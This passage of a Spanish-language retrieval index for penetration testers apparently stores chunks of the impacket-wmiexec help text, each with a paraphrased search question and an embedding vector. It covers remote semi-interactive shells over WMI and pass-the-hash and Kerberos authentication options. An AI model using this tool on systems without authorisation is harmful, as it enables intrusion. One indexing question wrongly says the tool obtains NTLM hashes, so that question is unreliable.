[-silentcommand]\n [-debug] [-codec CODEC] [-shell-type {cmd,powershell}]\n [-com-version MAJOR_VERSION:MINOR_VERSION]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]\n [-dc-ip ip address] [-A authfile] [-keytab KEYTAB]\n target [command ...]\n\nExecutes a semi-interactive shell using Windows Management Instrumentation.\n\npositional arguments:\n target [[domain/]username[:password]@]\n command command to execute at the target. If empty it will\n launch a semi-interactive shell", "indexar": "existe alguna alternativa libre a wmiexec para controlar mΓ‘quinas remotas", "v": [0.01459, 0.04028, -0.1713, -0.12269, -0.085, -0.039, -0.06072, 0.088, -0.13926, -0.07674, -0.10504, -0.17932, 0.16209, 0.04881, 0.23602, -0.01549, 0.04561, -0.01522, 0.04603, -0.04184, -0.01147, -0.12516, -0.03506, -0.02508, 0.02409, 0.02211, -0.02493, -0.05391, -0.17288, -0.0524, 0.05186, 0.05824, 0.13693, -0.0114, -0.03018, -0.0093, 0.07383, 0.03112, 0.20549, 0.02885, 0.06514, -0.04605, -0.14781, 0.01185, 0.14157, -0.06375, 0.0096, 0.02923, 0.05551, 0.03858, -0.11102, -0.07963, -0.03748, 0.03901, 0.06562, -0.08793, 0.10996, -0.04008, -0.02449, -0.07865, -0.0415, 0.02556, 0.03223, 0.01104, -0.03915, 0.07879, -0.01292, -0.09876, -0.11214, 0.10889, -0.01124, -0.08021, 0.04871, -0.02024, -0.03193, -0.10187, -0.08273, 0.02142, 0.00925, -0.00213, -0.0852, -0.06634, -0.08624, -0.0607, 0.05536, -0.08415, -0.0153, -0.0874, -0.04166, -0.01471, 0.044, -0.00462, 0.03368, 0.06068, 0.10093, -0.00997, -0.02997, 0.07184, 0.02364, 0.0463, 0.10066, 0.07634, -0.07151, 0.08909, -0.04757, 0.0256, 0.07116, -0.01166, -0.04428, 0.01549, 0.03712, 0.04881, -0.048, 0.0064, -0.05799, -0.05067, -0.05147, 0.05346, 0.00106, -0.01626, -0.01978, -0.01908, 0.03535, -0.04768, 0.04974, -0.04429, 0.04652, 0.091, -0.02062, -0.0291, 0.08554, -0.064, -0.02114, -0.09037, -0.04464, 0.00415, 0.07384, -0.03823, -0.05228, -0.07025, -0.0623, 0.05975, -0.0634, -0.04866, 0.05427, -0.04391, 0.00164, -0.0169, 0.04853, -0.02424, 0.01433, -0.06989, 0.00663, 0.12219, -0.01793, 0.07377, -0.03975, -0.00584, -0.04705, 0.04845, -0.03293, -0.06273, -0.09347, -0.03745, -0.05233, 0.04058, 0.02895, -0.03257, -0.09653, 0.01979, -0.05364, 0.08114, 0.1068, -0.02812, 0.04097, -0.0612, 0.04519, -0.10235, 0.04211, -0.04876, 0.02554, 0.0221, -0.00473, -0.0631, 0.0097, 0.03003, -0.01927, 0.0319, -0.00268, -0.00252, 0.00846, -0.03896, -0.08406, -0.11317, 0.06943, 0.03671, 0.03491, -0.02088, -0.01111, -0.01732, -0.05228, -0.01916, 0.01989, -0.02391, 0.03142, 0.01753, -0.00133, 0.012, 0.00129, 0.01522, 0.09191, 0.02201, -0.02398, -0.00716, -0.05905, 0.01246, 0.00528, -0.04849, -0.03723, -0.04577, 0.03552, -0.07777, 0.02614, 0.04582, 0.04492, 0.0563, 0.03557, 0.07731, 0.05982, -0.01228, 0.026, -0.00343, 0.04852, 0.04329, -0.01742, -0.03789, 0.03695, -0.04924, 0.03677, 0.03822, 0.00184, 0.07448, -0.01634, -0.06278, -0.07412, -0.00158, -0.0854, -0.05052, -0.08547, -0.00231, -0.00448, 0.00137, 0.0027, 0.0111, -0.01375, 0.11061]} +{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "# impacket-wmiexec β€” manual\n\nSalida de `impacket-wmiexec -h`, capturada de la propia herramienta. Referencia completa de opciones (las invocaciones del dia a dia estan en el cheatsheet de comandos).\n\n```\nImpacket v0.10.0 - Copyright 2022 SecureAuth Corporation\n\nusage: wmiexec.py [-h] [-share SHARE] [-nooutput] [-ts] [-silentcommand]\n [-debug] [-codec CODEC] [-shell-type {cmd,powershell}]\n [-com-version MAJOR_VERSION:MINOR_VERSION]\n [-hashes LMHASH:NTHASH] [-no-pass] [-k] [-aesKey hex key]\n [-dc-ip ip address] [-A authfile] [-keytab KEYTAB]\n target [command ...]\n\nExecutes a semi-interactive shell using Windows Management Instrumentation.\n\npositional arguments:\n target [[domain/]username[:password]@]\n command command to execute at the target. If empty it will\n launch a semi-interactive shell", "indexar": "cual programa me sirve para lanzar shells mediante WMI", "v": [-0.04261, 0.10441, -0.07298, -0.03418, -0.02551, -0.03693, -0.08382, -0.15136, -0.12083, -0.18416, -0.03099, 0.00448, 0.08061, -0.13939, 0.08339, 0.10066, -0.02513, -0.08319, 0.02441, -0.0046, 0.02354, -0.01248, -0.08142, -0.11315, -0.09861, 0.05206, 0.09298, -0.12267, -0.13373, -0.04301, -0.05804, -0.03065, -0.01252, -0.11002, 0.00474, 0.03473, -0.10439, 0.0272, 0.02144, 0.10523, 0.08546, -0.04753, -0.09496, 0.0467, 0.17552, -0.03168, 0.11839, -0.07068, 0.15093, 0.01954, -0.04689, 0.07157, -0.04957, 0.12246, 0.01035, -0.12167, 0.05174, -0.14283, -0.02801, 0.03662, -0.02151, -0.01715, 0.01219, -0.11697, 0.09251, -0.08774, 0.00471, -0.07806, -0.10915, -0.01161, 0.04928, -0.01044, 0.12345, -0.01635, -0.02805, 0.07999, -0.03365, 0.00682, 0.12448, -0.08461, -0.07081, -0.08151, 0.03849, 0.11507, 0.02517, -0.04019, 0.01223, -0.00316, -0.00106, -0.02201, -0.03195, 0.00073, -0.0367, 0.08297, 0.0488, -0.0791, 0.00837, 0.05248, 0.00944, 0.11597, 0.05821, -0.14041, -0.12762, 0.09846, -0.03197, 0.09182, 0.02528, -0.03171, -0.06655, 0.13572, -0.04445, -0.01775, -0.12763, -0.0717, -0.05403, -0.02041, -0.06415, -0.06134, 0.03786, -0.07112, -0.07034, 0.00261, -0.07527, 0.05016, 0.01912, 0.05814, -0.07058, 0.0784, -0.02726, 0.1196, 0.03754, 0.01151, 0.041, 0.0099, 0.00124, -0.08094, 0.08059, -0.05976, 0.04257, -0.02672, 0.07213, 0.02681, -0.01397, 0.01365, 0.03497, 0.00499, 0.03457, -0.00504, -0.03484, -0.04376, -0.0402, 0.0736, -0.02116, 0.02749, -0.0933, -0.08749, 0.01487, 0.0103, -0.01887, -0.01562, -0.01389, -0.00857, 0.01818, -0.00979, 0.03541, -0.06088, -0.02794, -0.01074, 0.07387, 0.03556, -0.00136, 0.0819, 0.03638, 0.00731, 0.03322, -0.00562, -0.0195, -0.01305, 0.05213, -0.04117, -0.06294, 0.0488, 0.06616, -0.02529, -0.07747, -0.05311, -0.07664, 0.03806, 0.01336, -0.01129, 0.01698, 0.01004, 0.00015, 0.02247, -0.00776, 0.00119, -0.00756, -0.08711, 0.04776, -0.0698, -0.02965, 0.0619, -0.00876, -0.03605, 0.04411, 0.09985, 0.00465, 0.00672, 0.02584, 0.0813, 0.03552, 0.01069, 0.09246, 0.04165, -0.02305, 0.01, 0.04219, 0.02957, 0.05919, 0.11024, -0.05974, -0.02754, 0.05415, 0.00465, 0.01213, -0.04156, 0.04521, -0.01365, 0.00402, -0.01665, -0.0298, -0.00093, 0.03362, -0.05436, 0.01952, -0.00597, -0.00077, -0.03764, -0.01612, -0.06116, -0.03556, 0.06618, -0.02221, -0.06944, 0.0091, -0.00404, -0.07195, 0.01465, -0.00251, 0.02183, -0.07695, 0.06787, 0.03768, -0.02858, 0.05833, 0.00061]} +{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n -share SHARE share where the output will be grabbed from (default\n ADMIN$)\n -nooutput whether or not to print the output (no SMB connection\n created)\n -ts Adds timestamp to every logging output\n -silentcommand does not execute cmd.exe to run given command (no\n output)\n -debug Turn DEBUG output ON\n -codec CODEC Sets encoding used (codec) from the target's output\n (default \"utf-8\"). If errors are detected, run\n chcp.com at the target, map the result with https://do\n cs.python.org/3/library/codecs.html#standard-encodings\n and then execute wmiexec.py again with -codec and the\n corresponding codec\n -shell-type {cmd,powershell}\n choose a command processor for the semi-interactive\n shell\n -com-version MAJOR_VERSION:MINOR_VERSION\n DCOM version, format is MAJOR_VERSION:MINOR_VERSION\n e.g. 5.7", "indexar": "que herramienta sirve para ejecutar comandos a travΓ©s de la consola remota?", "v": [0.12663, 0.00795, -0.23828, -0.1641, 0.06591, -0.18092, 0.04236, -0.05798, -0.00615, -0.05905, -0.1657, 0.01421, 0.13439, -0.08227, 0.06315, 0.05338, 0.14782, -0.02697, -0.04693, -0.01112, 0.07469, -0.06273, 0.03761, -0.05056, -0.03375, -0.00022, 0.15208, 0.01867, -0.10798, -0.06881, -0.03347, -0.02046, 0.1094, -0.09509, -0.04317, -0.01501, -0.11925, 0.01584, -0.02074, 0.07079, 0.00398, 0.08815, -0.12877, -0.01454, 0.04756, -0.05631, 0.07986, 0.01693, 0.03614, 0.00134, -0.03446, -0.1183, -0.07879, -0.02383, -0.00481, -0.10345, 0.20042, -0.1025, 0.04662, -0.03553, -0.07246, -0.12728, 0.03989, 0.04245, 0.00314, -0.01979, -0.09397, -0.17238, -0.08671, 0.08326, -0.16542, 0.02783, 0.00162, 0.02196, -0.01117, -0.07957, -0.09681, -0.00991, 0.11794, -0.05457, 0.02409, -0.08909, -0.14722, -0.02179, -0.03976, -0.10437, 0.01208, -0.03924, 0.00116, -0.11355, -0.00427, -0.01164, -0.00249, 0.04669, 0.09492, 0.03432, 0.06605, -0.05685, 0.04345, -0.02705, 0.10957, -0.04497, -0.09434, 0.09933, -0.02035, 0.02779, 0.02318, -0.04324, -0.00446, 0.00263, 0.04848, 0.00679, -0.00135, -0.01745, -0.03682, 0.00536, -0.07745, -0.07165, 0.06868, -0.00696, -0.02622, 0.06154, -0.03533, -0.0204, -0.00884, -0.02813, -0.07848, 0.03337, 0.05043, -0.02187, -0.03214, -0.0854, 0.03668, -0.00254, -0.02223, 0.07183, -0.00073, -0.1107, -0.05692, -0.1279, 0.07164, 0.0818, -0.00927, -0.07392, 0.11292, 0.01301, 0.07448, -0.02666, -0.01791, -0.00272, 0.08299, -0.00928, -0.03411, 0.02212, -0.02978, -0.00306, -0.04361, 0.04113, -0.10093, 0.07277, -0.048, -0.06827, -0.02785, -0.00972, -0.00281, -0.06381, -0.03433, 0.01149, 0.01401, 0.03651, -0.03146, 0.02095, 0.0423, -0.00913, 0.00907, -0.05519, -0.03466, 0.01353, 0.01291, -0.05564, -0.04702, 0.02789, -0.05934, -0.06755, -0.02287, -0.04416, -0.02345, -0.05898, -0.00268, 0.00206, 0.00662, 0.0452, -0.02475, -0.04363, 0.03937, 0.01417, -0.02479, -0.04487, -0.01718, -0.03592, -0.0234, 0.01597, -0.00751, -0.05978, 0.04095, 0.04429, -0.01167, 0.03069, -0.02256, 0.03435, 0.04331, 0.01194, 0.04059, 0.02894, 0.00516, -0.07969, 0.03644, -0.01836, -0.01412, 0.01529, 0.01328, -0.02083, 0.07862, -0.05715, -0.00328, 0.05617, 0.02099, -0.00113, 0.01038, -0.08474, 0.04817, -0.01097, 0.00723, -0.02781, 0.01653, -0.03967, 0.04033, -0.0363, -0.02299, -0.02432, -0.025, 0.04993, -0.01481, -0.07753, -0.02001, -0.09069, -0.05974, -0.02675, -0.02691, -0.06199, -0.03477, 0.00279, 0.0478, -0.0229, -0.02982, -0.01469]} +{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n -share SHARE share where the output will be grabbed from (default\n ADMIN$)\n -nooutput whether or not to print the output (no SMB connection\n created)\n -ts Adds timestamp to every logging output\n -silentcommand does not execute cmd.exe to run given command (no\n output)\n -debug Turn DEBUG output ON\n -codec CODEC Sets encoding used (codec) from the target's output\n (default \"utf-8\"). If errors are detected, run\n chcp.com at the target, map the result with https://do\n cs.python.org/3/library/codecs.html#standard-encodings\n and then execute wmiexec.py again with -codec and the\n corresponding codec\n -shell-type {cmd,powershell}\n choose a command processor for the semi-interactive\n shell\n -com-version MAJOR_VERSION:MINOR_VERSION\n DCOM version, format is MAJOR_VERSION:MINOR_VERSION\n e.g. 5.7", "indexar": "con que puedo conectarme y correr un script en otro servidor mediante SMB?", "v": [-0.03704, 0.06062, -0.20184, -0.16577, -0.09661, -0.11939, -0.09428, -0.03489, 0.01768, -0.09543, -0.18035, 0.03523, 0.08737, -0.12872, 0.04552, 0.09711, 0.05284, -0.03527, -0.0006, 0.00884, 0.10298, -0.02038, 0.04918, -0.04614, -0.01095, 0.05286, 0.05951, 0.05676, -0.03808, -0.13137, -0.02807, 0.05821, 0.16636, 0.0181, 0.03369, -0.16291, -0.05383, 0.11484, 0.0354, 0.05787, -0.01417, -0.00055, -0.05408, 0.04613, 0.05497, -0.01613, 0.07262, -0.03213, 0.07997, -0.07148, -0.04428, 0.02109, -0.12252, -0.08325, -0.14132, 0.10949, 0.0751, -0.09885, -0.00311, -0.03089, -0.05697, 0.00536, -0.05053, -0.02793, 0.08927, 0.01768, -0.04707, -0.06567, -0.13581, -0.0845, -0.01884, 0.05156, -0.19191, 0.00428, 0.04683, 0.07775, -0.02563, -0.03526, 0.10779, 0.05416, -0.03101, -0.0743, 0.0113, 0.09802, -0.07951, -0.07858, -0.03605, 0.01573, 0.12613, 0.02181, 0.07809, 0.02931, -0.04501, -0.0109, -0.08427, -0.03002, 0.10566, -0.03554, 0.04288, 0.10509, 0.0048, 0.11961, -0.07534, 0.07338, -0.02662, 0.02341, 0.14515, -0.04465, 0.09548, 0.02441, -0.02085, -0.02641, -0.05421, -0.05375, -0.02319, -0.07949, -0.05401, -0.03842, -0.02487, 0.07206, -0.10794, -0.02463, -0.03205, -0.01229, -0.07125, -0.06349, 0.05542, 0.00141, 0.03807, 0.06473, -0.03006, 0.05755, -0.05397, -0.11614, -0.0837, 0.09586, 0.04467, -0.0198, -0.05697, -0.05962, 0.05184, -0.04417, 0.01633, 0.01781, -0.00406, -0.02541, -0.01472, -0.08122, -0.08039, 0.03379, 0.02278, -0.02442, -0.12022, 0.0342, -0.05868, -0.045, 0.05072, -0.04575, -0.05076, 0.0429, -0.03679, 0.065, 0.02509, 0.05291, -0.03378, -0.01413, -0.00162, -0.01701, 0.05, 0.05984, -0.06501, 0.05376, 0.00833, -0.01869, 0.04875, -0.07524, -0.01723, -0.06564, 0.0498, -0.01519, -0.01703, 0.00265, 0.00902, -0.00061, -0.04918, -0.03447, -0.01523, 0.00504, -0.01275, 0.0458, 0.06171, 0.06459, -0.01462, -0.01046, 0.01582, -0.06409, -0.02615, -0.02476, 0.00737, 0.01143, -0.14048, 0.02928, -0.02975, -0.01501, 0.0533, 0.0318, -0.00833, 0.04227, 0.02153, 0.00941, 0.07344, -0.06334, 0.07895, -0.05196, -0.02385, 0.03158, 0.1015, -0.03166, -0.00133, -0.039, 0.03472, 0.04657, -0.00569, 0.03731, 0.01683, -0.02441, 0.03027, -0.00286, 0.05047, -0.02111, -0.07008, 0.01278, -0.04112, -0.0179, 0.02518, 0.02843, -0.02742, -0.05463, -0.03705, -0.03519, -0.04897, 0.0599, -0.03331, -0.06733, -0.02362, 0.00521, -0.0673, -0.01457, -0.08572, -0.03827, -0.00669, -0.03571, 0.00375, -0.01699, 0.0255, 0.01215]} +{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "options:\n -h, --help show this help message and exit\n -share SHARE share where the output will be grabbed from (default\n ADMIN$)\n -nooutput whether or not to print the output (no SMB connection\n created)\n -ts Adds timestamp to every logging output\n -silentcommand does not execute cmd.exe to run given command (no\n output)\n -debug Turn DEBUG output ON\n -codec CODEC Sets encoding used (codec) from the target's output\n (default \"utf-8\"). If errors are detected, run\n chcp.com at the target, map the result with https://do\n cs.python.org/3/library/codecs.html#standard-encodings\n and then execute wmiexec.py again with -codec and the\n corresponding codec\n -shell-type {cmd,powershell}\n choose a command processor for the semi-interactive\n shell\n -com-version MAJOR_VERSION:MINOR_VERSION\n DCOM version, format is MAJOR_VERSION:MINOR_VERSION\n e.g. 5.7", "indexar": "cual es una alternativa libre a wmiexec.py para manejar shell interactiva?", "v": [0.02601, 0.00913, -0.11951, -0.06212, -0.00359, -0.07232, -0.12774, -0.08999, -0.13431, -0.04535, 0.0443, -0.01155, 0.01977, -0.03979, 0.04026, -0.00097, -0.04162, -0.02676, 0.09963, -0.01851, -0.06889, 0.08499, -0.22433, -0.11551, -0.09024, 0.06413, -0.02627, 0.01893, -0.11058, -0.05317, 0.00783, 0.02403, 0.10294, -0.03405, -0.05339, 0.0255, 0.11677, -0.00524, 0.09812, 0.00858, -0.12872, -0.07974, -0.17231, 0.17363, 0.04094, -0.06746, 0.03613, -0.01912, 0.08749, 0.05339, -0.08347, -0.04989, -0.14719, 0.07971, 0.09761, -0.0235, 0.14967, -0.14634, -0.0134, -0.08373, -0.08523, 0.0025, 0.00321, -0.04071, 0.0446, -0.00152, -0.00869, -0.14086, -0.10126, 0.11536, 0.01451, -0.01469, 0.05336, 0.00163, -0.04675, 0.01845, -0.06308, -0.04237, 0.01789, 0.10523, -0.07086, -0.08362, 0.04283, 0.0812, 0.00711, -0.09712, 0.06344, -0.18041, 0.03234, 0.01809, 0.10824, -0.00414, 0.00524, 0.12702, -0.04401, -0.09722, 0.01841, 0.11683, 0.09895, 0.01997, 0.01775, 0.02279, -0.12291, 0.0726, -0.00295, -0.02331, -0.07616, 0.09408, -0.07788, 0.06281, 0.05054, -0.02177, -0.02798, -0.00099, -0.02004, -0.038, -0.09442, 0.01467, -0.02043, -0.07111, -0.05065, 0.00512, -0.02725, -0.03505, 0.01888, -0.01703, 0.03198, 0.09478, -0.0606, 0.02882, 0.01005, -0.06099, 0.00078, -0.09203, -0.03589, -0.00141, 0.12103, -0.04318, 0.01656, -0.01492, 0.02229, 0.02347, -0.00982, -0.02586, 0.02354, 0.0179, 0.04355, 0.05142, 0.00659, 0.00946, -0.00228, -0.053, 0.03027, 0.11336, -0.03396, 0.02654, -0.02152, 0.01415, -0.05143, 0.02359, 0.01769, -0.04884, -0.02424, -0.01161, -0.05062, -0.07094, -0.0771, -0.04921, -0.03537, 0.01296, -0.0109, 0.05776, 0.11727, -0.02263, 0.04683, -0.10222, -0.06175, -0.0693, 0.02975, -0.04824, 0.04702, -0.03789, -0.05546, -0.04628, -0.03612, -0.02916, -0.00247, 0.04512, -0.0348, 0.01083, -0.02772, 0.01956, -0.09045, -0.10965, 0.04481, 0.00944, 0.07118, -0.08513, 0.03161, 0.0029, 0.00171, 0.02416, -0.05291, -0.06761, 0.02019, 0.03466, -0.00894, 0.04851, 0.05325, 0.03405, 0.07738, 0.02017, 0.11715, 0.04221, 0.00682, -0.00378, 0.02674, 0.01296, -0.03042, 0.01406, 0.0279, 0.06736, 0.05233, -0.04659, 0.00359, 0.02654, 0.00036, 0.00603, -0.00188, 0.03318, -0.04675, -0.01147, 0.06058, 0.05784, 0.0172, 0.00027, 0.01851, 0.01014, 0.00766, -0.03255, 0.04498, 0.10723, -0.06821, -0.04143, -0.03541, -0.02382, -0.06252, 0.01966, -0.05205, -0.05569, -0.07021, -0.01204, -0.00341, 0.00226, -0.01341, -0.01058]} +{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -A authfile smbclient/mount.cifs-style authentication file. See\n smbclient man page's -A option.\n -keytab KEYTAB Read keys for SPN from keytab file\n```", "indexar": "que herramienta puedo usar para obtener hashes de autenticaciΓ³n NTLM?", "v": [-0.04859, 0.00817, -0.13752, -0.0912, 0.1033, -0.03664, -0.19934, 0.04515, -0.11739, 0.16228, -0.15957, -0.00732, 0.03309, 0.05696, -0.03639, 0.09674, 0.01036, -0.15687, -0.03165, 0.05355, -0.02045, -0.04309, -0.22038, -0.07609, -0.06989, -0.037, 0.02161, 0.01586, -0.16787, 0.06827, -0.03698, 0.00311, -0.06254, 0.048, -0.03466, -0.03221, -0.01084, 0.04717, 0.04037, 0.11546, 0.10659, 0.14949, -0.04108, 0.09371, 0.09701, 0.0026, -0.05162, -0.01859, 0.00225, -0.05824, 0.00587, -0.06437, -0.23787, -0.07405, -0.07378, -0.14467, 0.21158, -0.0307, -0.03031, -0.08515, -0.09035, -0.02997, -0.02427, -0.08413, -0.06481, -0.07433, 0.07765, -0.05198, -0.08333, 0.05513, -0.10362, 0.06995, 0.08161, -0.04585, -0.00225, 0.00989, -0.01439, -0.02901, 0.07763, 0.06606, 0.06397, -0.06479, 0.00963, -0.04104, -0.11194, -0.09242, 0.09768, -0.07431, 0.0762, -0.04466, -0.04563, 0.04836, -0.00862, -0.05805, 0.07049, -0.06434, 0.01663, -0.0652, 0.01781, -0.02381, 0.12851, -0.09917, -0.02657, 0.09907, -0.04114, -0.04012, 0.00656, -0.01138, -0.03296, 0.04904, 0.05259, -0.04035, -0.08729, 0.03746, -0.01788, 0.08859, -0.01536, -0.05116, -0.04067, -0.07435, 0.02891, 0.01374, -0.00646, 0.00682, 0.06665, -0.00092, -0.03755, 0.10043, -0.07597, -0.07723, 0.02311, -0.05951, -0.07727, 0.01387, 0.01085, -0.03809, 0.01321, -0.10974, 0.01979, -0.03965, 0.05206, 0.02451, -0.05302, -0.08545, 0.04339, 0.00852, -0.07034, -0.06803, -0.02302, -0.05335, 0.11672, -0.05979, 0.00155, 0.02844, -0.03528, -0.00101, 0.01629, 0.0033, -0.13923, 0.03809, -0.0544, -0.0357, 0.02536, 0.0403, 0.00185, -0.04495, 0.06399, -0.0039, 0.02803, 0.03636, 0.0485, 0.01961, 0.06027, -0.03634, 0.03878, -0.04714, -0.02927, 0.01113, -0.0488, -0.10975, 0.02424, -0.00084, -0.01803, -0.06002, 0.06804, 0.01822, 0.02888, 0.0166, -0.03998, 0.03448, -0.01022, 0.05872, 0.00452, -0.03085, 0.03617, 0.03678, 0.03353, -0.0463, 0.06542, -0.02932, -0.03935, 0.00933, -0.0099, -0.06603, 0.0845, 0.03845, -0.06056, -0.02811, -0.01922, 0.02308, 0.04032, -0.00683, 0.03767, -0.04475, -0.02929, 0.00133, -0.01428, 0.01602, -0.02354, -0.01393, -0.01287, 0.03229, 0.02959, 0.03842, 0.01757, -0.01364, -0.00284, 0.00927, -0.01221, -0.00648, 0.03269, -0.01397, -0.02804, -9e-05, 0.01952, -0.03411, 0.02909, 0.01559, -0.03885, -0.02617, 0.00381, 0.04697, 0.0063, 0.00465, -0.02306, -0.01104, -0.03233, -0.0098, -0.02714, -0.03512, -0.00932, -0.02334, 0.06991, -0.0078, -0.01415, -0.00056]} +{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -A authfile smbclient/mount.cifs-style authentication file. See\n smbclient man page's -A option.\n -keytab KEYTAB Read keys for SPN from keytab file\n```", "indexar": "cual es una opcion para no pedirme la contraseΓ±a y usar credenciales guardadas?", "v": [0.03073, 0.03547, -0.15391, -0.01617, 0.05922, -0.05691, 0.02049, -0.0964, -0.10102, -0.15768, -0.04858, -0.02237, -0.07589, -0.08256, -0.07961, -0.00241, 0.1519, 0.07894, 0.12774, 0.05318, -0.01927, -0.06752, -0.05138, -0.0403, -0.12803, 0.03661, 0.08882, -0.04445, -0.09917, -0.0566, -0.00397, -0.02603, 0.00758, 0.0192, -0.00236, 0.18873, -0.07273, 0.04857, 0.0459, 0.16296, 0.05349, 0.06112, -0.07445, 0.12464, 0.02301, 0.03888, 0.00799, 0.16594, -0.00759, -0.00323, -0.11719, -0.09868, -0.12104, -0.07682, -0.00375, -0.03287, 0.18311, -0.04544, -0.00779, -0.00395, -0.09526, 0.02433, 0.11066, 0.09189, -0.09916, -0.11641, -0.02248, 0.0143, -0.06211, 0.05879, -0.0514, 0.0018, -0.10422, 0.09006, 0.0387, -0.00439, 0.02478, -0.03012, 0.10118, 0.10261, -0.01262, -0.01358, 0.02263, 0.02075, -0.06958, -0.05047, 0.01562, 0.0039, 0.00376, -0.02177, 0.09834, 0.0255, -0.07158, 0.00717, 0.02322, -0.09862, -0.07483, 0.03238, -0.08215, -0.02494, 0.05615, -0.03066, -0.02849, 0.14932, -0.06709, -0.01776, -0.02974, -0.0104, 0.00094, -0.05024, 0.06494, 0.02263, -0.08778, 0.00596, -0.03165, -0.02796, -0.06222, -0.14896, 0.03346, 0.01844, 0.02563, -0.09352, 0.05711, -0.02877, 0.09103, 0.09858, -0.0031, 0.05996, -0.11659, -0.077, -0.03324, -0.03933, -0.03308, -0.05594, -0.06384, -0.00985, -0.05, -0.11591, -0.08877, 0.02871, 0.03156, -0.00683, 0.02294, -0.09064, 0.07424, 0.04996, 0.03619, -0.03082, -0.00293, -0.04099, -0.01635, 0.02239, 0.01573, 0.04139, -0.01675, 0.04359, 0.03826, -0.12115, -0.03552, 0.0978, -0.02306, -0.05194, 0.00075, 0.05545, -0.08798, -0.12453, -0.00529, 0.00731, 0.00157, -0.00142, 0.04744, 0.03768, -0.08215, -0.0511, 0.00689, -0.03712, -0.02722, -0.03875, -0.02297, -0.08402, 0.00204, -0.0249, -0.03075, 0.00447, 0.03538, -0.06287, 0.07341, 0.00655, -0.08003, 0.01131, 0.04137, 0.03145, -0.00864, 0.064, 0.00656, -0.01408, 0.03099, -0.05976, 0.00067, -0.06615, -0.04428, -0.01613, -0.05268, -0.07044, 0.09519, -0.00119, -0.08314, -0.0504, -0.01947, 0.01421, 0.03272, -0.07965, 0.06289, -0.02872, -0.05398, -0.02127, -0.01089, 0.04949, -0.08813, -0.03688, 0.04969, 0.04914, -0.02051, 0.0498, 0.02516, -0.00415, -0.02836, 0.03183, -0.03174, 0.03186, -0.04674, 0.02356, -0.05077, -0.02638, 0.09719, 0.01323, -0.0232, -0.02029, -0.03229, -0.07414, -0.02123, 0.08486, -0.01798, -0.06608, -0.05155, 0.00328, -0.08507, 0.04819, 0.02551, -0.01211, -0.03792, -0.01281, 0.01811, -0.04281, 0.06124, -0.01075]} +{"tipo": "pregunta", "herramienta": "impacket-wmiexec", "perfil": "PENTESTERS", "fichero": "conocimiento/09 - Manuales/impacket-wmiexec.md", "tema": "manuales", "fuente": null, "licencia": null, "texto": "authentication:\n -hashes LMHASH:NTHASH\n NTLM hashes, format is LMHASH:NTHASH\n -no-pass don't ask for password (useful for -k)\n -k Use Kerberos authentication. Grabs credentials from\n ccache file (KRB5CCNAME) based on target parameters.\n If valid credentials cannot be found, it will use the\n ones specified in the command line\n -aesKey hex key AES key to use for Kerberos Authentication (128 or 256\n bits)\n -dc-ip ip address IP Address of the domain controller. If ommited it use\n the domain part (FQDN) specified in the target\n parameter\n -A authfile smbclient/mount.cifs-style authentication file. See\n smbclient man page's -A option.\n -keytab KEYTAB Read keys for SPN from keytab file\n```", "indexar": "como puedo especificar el IP del dominio controlador si no me detecta automaticamente?", "v": [0.1148, 0.09779, -0.16952, -0.12927, 0.07242, -0.12986, 0.07532, -0.00462, -0.2145, -0.01602, 0.05142, -0.06977, -0.03721, -0.18473, 0.00908, 0.01526, 0.1658, -0.09944, -0.04633, -0.05732, 0.01618, -0.06325, -0.02024, -0.06029, 0.04904, 0.06756, -0.14673, 0.05315, -0.09899, -0.10021, -0.03837, -0.02592, 0.03841, -0.01693, -0.10542, -0.0874, -0.0148, 0.0577, 0.05165, 0.10315, 0.051, 0.02636, -0.09039, 0.00247, 0.03459, 0.02525, 0.05617, -0.1158, 0.03357, -0.11915, -0.08381, -0.0703, -0.08687, 0.0125, -0.04834, 0.00029, 0.14371, -0.02386, 0.14112, -0.0867, 0.0161, -0.03714, 0.02389, 0.0585, -0.12285, -0.02472, -0.0173, 0.01387, -0.03285, -0.06167, 0.06548, -0.00974, 0.03422, 0.07673, 0.09648, -0.01505, -0.01002, 0.01138, 0.2089, -0.02863, 0.03853, 0.00369, -0.07255, -0.06179, -0.04085, -0.07972, -0.1072, -0.21093, 0.01714, -0.04829, 0.00035, 0.01707, -0.02147, 0.00316, 0.00298, -0.00079, 0.07013, 0.01764, -0.06823, -0.01039, 0.11401, 0.09369, -0.13667, 0.14732, 0.1465, 0.09198, 0.0837, -0.04747, 